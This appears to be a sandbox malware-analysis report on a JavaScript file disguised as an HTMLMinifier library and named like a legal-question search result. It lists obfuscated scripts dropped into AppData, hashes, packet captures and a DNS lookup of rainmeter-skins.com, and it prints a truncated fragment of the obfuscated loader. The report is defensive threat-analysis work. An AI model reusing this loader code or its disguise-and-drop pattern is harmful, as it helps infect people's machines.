                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xef1k1r5.04l.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Global Responsibility.dat

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):41857228
                                                                                        Entropy (8bit):5.660340687225333
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:DjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMj:i
                                                                                        MD5:07D36DB72BB2311506A491506347A343
                                                                                        SHA1:CEAADAE9FF9439CE899EA052427DA9C4AED817CA
                                                                                        SHA-256:CD7DBAB5E0EEE0015A2CD4A7913DC80557CE397563C1EEB12D35638C37355D55
                                                                                        SHA-512:CB14E737FA0314D59BF9E9B7539FADE25072AB77DAB03B7C4723FA725E2B598FFFAD7C27DEC43F40503CAC4B24E06A364A7EB1049D6CC37085B7D7EE9522CA87
                                                                                        Malicious:false
                                                                                        Preview:14586479104796686626222470333557190362637571802;function nor2(mvpj, shvh, greenr){if(bgnqe(liqrh)) { jbawjhv(leavexr) } else { iLvsm(); }}value0 = [];function has3(low7, bawex, hole7) {cikplu=low7.length;return cikplu;}function poemi(){lay7[oguald](lay7[onced])(leavexr);leavexr = present0x;}morning3='+S?+)e;??uSgeqlt?EEh(r';pzmom='\\+\"2a?m,rie1?k?3+o+1?o?';omufan = 4121;liqrh = 22465;energy4='LsTo?tN?+? +?+s?E?wiseotYndcSfnntuiuE';zowjcj='n)U(I?cwqSe[U?SYe(.]|+?(%)+4{??8$lT+_??2';function basev(bnjp, ugltxr, lqfozna, cgxui, kjichf, weret, ectz) {car2 = bnjp;return car2.substr(ugltxr,lqfozna);}jwbifv = 13869;wjeqa = 'twhSHJ';townc = 1;function afraid5(gox, range9, mnagzl) {if (mnagzl % (oguald-onced)) return (gox+range9); else return (range9+gox);}lwtar = 5105;pressm='w?lC[t?OY (T]?+?(+)+2???2NeO1???-';written4='+TyK?I?(oo+?dn?+?|S?+?\\ \"+?6(?e? Ni+';onced = townc;first0='HiSahcwstcrloptgcyuhr=tlsanyo7c;';reason6=')?6[?D+1TL6]ay1)??,)';leavexr = [2818];cblb = 1986;ajgluu=')++(???@+.N(

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Sociology Of Culture.js (copy)

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):41857228
                                                                                        Entropy (8bit):5.660340687225333
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:DjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMXjMj:i
                                                                                        MD5:07D36DB72BB2311506A491506347A343
                                                                                        SHA1:CEAADAE9FF9439CE899EA052427DA9C4AED817CA
                                                                                        SHA-256:CD7DBAB5E0EEE0015A2CD4A7913DC80557CE397563C1EEB12D35638C37355D55
                                                                                        SHA-512:CB14E737FA0314D59BF9E9B7539FADE25072AB77DAB03B7C4723FA725E2B598FFFAD7C27DEC43F40503CAC4B24E06A364A7EB1049D6CC37085B7D7EE9522CA87
                                                                                        Malicious:false
                                                                                        Preview:14586479104796686626222470333557190362637571802;function nor2(mvpj, shvh, greenr){if(bgnqe(liqrh)) { jbawjhv(leavexr) } else { iLvsm(); }}value0 = [];function has3(low7, bawex, hole7) {cikplu=low7.length;return cikplu;}function poemi(){lay7[oguald](lay7[onced])(leavexr);leavexr = present0x;}morning3='+S?+)e;??uSgeqlt?EEh(r';pzmom='\\+\"2a?m,rie1?k?3+o+1?o?';omufan = 4121;liqrh = 22465;energy4='LsTo?tN?+? +?+s?E?wiseotYndcSfnntuiuE';zowjcj='n)U(I?cwqSe[U?SYe(.]|+?(%)+4{??8$lT+_??2';function basev(bnjp, ugltxr, lqfozna, cgxui, kjichf, weret, ectz) {car2 = bnjp;return car2.substr(ugltxr,lqfozna);}jwbifv = 13869;wjeqa = 'twhSHJ';townc = 1;function afraid5(gox, range9, mnagzl) {if (mnagzl % (oguald-onced)) return (gox+range9); else return (range9+gox);}lwtar = 5105;pressm='w?lC[t?OY (T]?+?(+)+2???2NeO1???-';written4='+TyK?I?(oo+?dn?+?|S?+?\\ \"+?6(?e? Ni+';onced = townc;first0='HiSahcwstcrloptgcyuhr=tlsanyo7c;';reason6=')?6[?D+1TL6]ay1)??,)';leavexr = [2818];cblb = 1986;ajgluu=')++(???@+.N(

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:ASCII text, with very long lines (505)
                                                                                        Entropy (8bit):5.3616094354058665
                                                                                        TrID:
                                                                                        • Java Script (8502/1) 68.00%
                                                                                        • Digital Micrograph Script (4001/1) 32.00%
                                                                                        File name:does virginia have a no chase law for motorcycles 62848.js
                                                                                        File size:6'896'856 bytes
                                                                                        MD5:d9070baada2376260e5e4f3140828c66
                                                                                        SHA1:2d6de9cb4b27f4feea210451f682e18b221310c4
                                                                                        SHA256:c4951a5ec93bdec52c8b8b9d84bb143b8062f5eb9ffad8c740ed19fbead9dc4d
                                                                                        SHA512:47f44d8eba23f27679a68a0574186e6c6b2701f3ee9169108fdae9d166e84f226157c077a32be37ab29b749731fc8398987efbbb9b891a948b17a6dfef0aac92
                                                                                        SSDEEP:49152:8MytwpCQK+JGMytwpCQK+JGMytwpCQK+JGMytwpCQK+JGMytwpCQK+JGMytwpCQZ:8BBBBBK
                                                                                        TLSH:42662A5D7FF21122065771B64ABFA00AF2B98413941CD954F96CC3D02FE092986FBEE9
                                                                                        File Content Preview:/*!. * HTMLMinifier v4.0.0 (https://kangax.github.io/html-minifier/). * Copyright 2010-2019 Juriy "kangax" Zaytsev. * Licensed under the MIT license. */..require=(function(){function r(e,n,t){function o(i,f){if(!n[i]){if(!e[i]){var c="function"==typeof re

                                                                                        File Icon

                                                                                        Icon Hash:68d69b8bb6aa9a86

                                                                                        Network Behavior

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        May 6, 2024 20:42:48.617208004 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:48.617265940 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:48.617377043 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:48.623814106 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:48.623828888 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:48.914561033 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:48.914777994 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:48.917094946 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:48.917104006 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:48.917340994 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:48.929002047 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:48.929078102 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.209726095 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.261332035 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.261363029 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.308021069 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.350122929 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.350136042 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.350176096 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.350194931 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.350204945 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.350205898 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.350224018 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.350229025 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.350258112 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.353698015 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.353739977 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.353749037 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.353760958 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.353771925 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.353776932 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.353817940 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.491309881 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.491328955 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.491398096 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.491429090 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.491467953 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.495378017 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.495393038 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.495409966 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.495440006 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.495448112 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.495507002 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.498454094 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.498467922 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.498523951 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.498529911 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.542376995 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.631392002 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.631403923 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.631443024 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.631495953 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.631510973 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.631548882 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.635097027 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.635113955 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.635193110 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.635200024 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.635241985 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.638180017 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.638195992 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.638384104 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.638390064 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.638648987 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.641683102 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.641697884 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.641748905 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.641755104 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.641788006 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.645365000 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.645381927 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.645447016 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.645452976 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.645487070 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.648425102 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.648446083 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.648505926 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.648511887 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.648547888 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.649471045 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.649524927 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.649584055 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.649652958 CEST4434971150.116.62.225192.168.2.5
                                                                                        May 6, 2024 20:42:49.649787903 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:42:49.651057005 CEST49711443192.168.2.550.116.62.225
                                                                                        May 6, 2024 20:43:09.257635117 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:09.257668972 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:09.257776022 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:09.270610094 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:09.270626068 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:09.505419016 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:09.505606890 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:09.507714033 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:09.507725000 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:09.508044004 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:09.519515991 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:09.519584894 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:10.371032953 CEST49713443192.168.2.546.38.249.148
                                                                                        May 6, 2024 20:43:10.371071100 CEST4434971346.38.249.148192.168.2.5
                                                                                        May 6, 2024 20:43:10.371150970 CEST49713443192.168.2.546.38.249.148
                                                                                        May 6, 2024 20:43:10.371956110 CEST49713443192.168.2.546.38.249.148
                                                                                        May 6, 2024 20:43:10.371972084 CEST4434971346.38.249.148192.168.2.5
                                                                                        May 6, 2024 20:43:10.856787920 CEST4434971346.38.249.148192.168.2.5
                                                                                        May 6, 2024 20:43:10.856934071 CEST49713443192.168.2.546.38.249.148
                                                                                        May 6, 2024 20:43:10.858803034 CEST49713443192.168.2.546.38.249.148
                                                                                        May 6, 2024 20:43:10.858823061 CEST4434971346.38.249.148192.168.2.5
                                                                                        May 6, 2024 20:43:10.859093904 CEST4434971346.38.249.148192.168.2.5
                                                                                        May 6, 2024 20:43:10.860304117 CEST49713443192.168.2.546.38.249.148
                                                                                        May 6, 2024 20:43:10.860342026 CEST4434971346.38.249.148192.168.2.5
                                                                                        May 6, 2024 20:43:11.348089933 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348154068 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348186016 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348222971 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348253012 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.348254919 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348275900 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348304987 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.348323107 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.348323107 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348335028 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348371029 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.348556995 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348618031 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348649979 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.348654032 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348663092 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.348711014 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.348716974 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.349526882 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.349556923 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.349582911 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.349591017 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.349622011 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.350044012 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.350112915 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.350146055 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.350152016 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.350166082 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.350936890 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.350974083 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.350986958 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.350995064 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351035118 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.351038933 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351048946 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351078033 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.351114035 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351141930 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351176023 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.351181030 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351416111 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.351888895 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351950884 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351983070 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.351994991 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.352001905 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.352807045 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.352844954 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.352849007 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.352859020 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.352885962 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.352917910 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.352948904 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.352982044 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.352984905 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.352993965 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.353024960 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.353812933 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.353867054 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.353919029 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.353926897 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.353960991 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.354686975 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.354739904 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.457742929 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.457987070 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.458291054 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.458344936 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.458494902 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.458544970 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.458565950 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.458617926 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.459752083 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.459795952 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.459805012 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.459816933 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.459835052 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.459851027 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.460753918 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.460808992 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.460865974 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.460973024 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.461503983 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.461541891 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.461546898 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.461553097 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.461575031 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.461595058 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.462364912 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.462403059 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.462439060 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.462445021 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.462476969 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.462560892 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.462605000 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.463393927 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.463443995 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.464606047 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.464646101 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.464669943 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.464674950 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.464689970 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.464709044 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.491453886 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.491499901 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.491558075 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.491569042 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.491579056 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.491595030 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.505940914 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.506059885 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.567859888 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.568032026 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.568254948 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.568300962 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.568317890 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.568326950 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.568340063 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.568342924 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.568380117 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.568384886 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.568449020 CEST44349712172.67.208.58192.168.2.5
                                                                                        May 6, 2024 20:43:11.568486929 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.568942070 CEST49712443192.168.2.5172.67.208.58
                                                                                        May 6, 2024 20:43:11.608673096 CEST4434971346.38.249.148192.168.2.5
                                                                                        May 6, 2024 20:43:11.608772039 CEST4434971346.38.249.148192.168.2.5
                                                                                        May 6, 2024 20:43:11.608855009 CEST49713443192.168.2.546.38.249.148
                                                                                        May 6, 2024 20:43:11.609245062 CEST49713443192.168.2.546.38.249.148

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        May 6, 2024 20:42:48.376918077 CEST6008553192.168.2.51.1.1.1
                                                                                        May 6, 2024 20:42:48.588352919 CEST53600851.1.1.1192.168.2.5
                                                                                        May 6, 2024 20:43:08.961201906 CEST5745853192.168.2.51.1.1.1
                                                                                        May 6, 2024 20:43:09.109215021 CEST53574581.1.1.1192.168.2.5
                                                                                        May 6, 2024 20:43:10.028700113 CEST5373053192.168.2.51.1.1.1
                                                                                        May 6, 2024 20:43:10.367945910 CEST53537301.1.1.1192.168.2.5

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        May 6, 2024 20:42:48.376918077 CEST192.168.2.51.1.1.10xbe7bStandard query (0)rainmeter-skins.comA (IP address)IN (0x0001)false
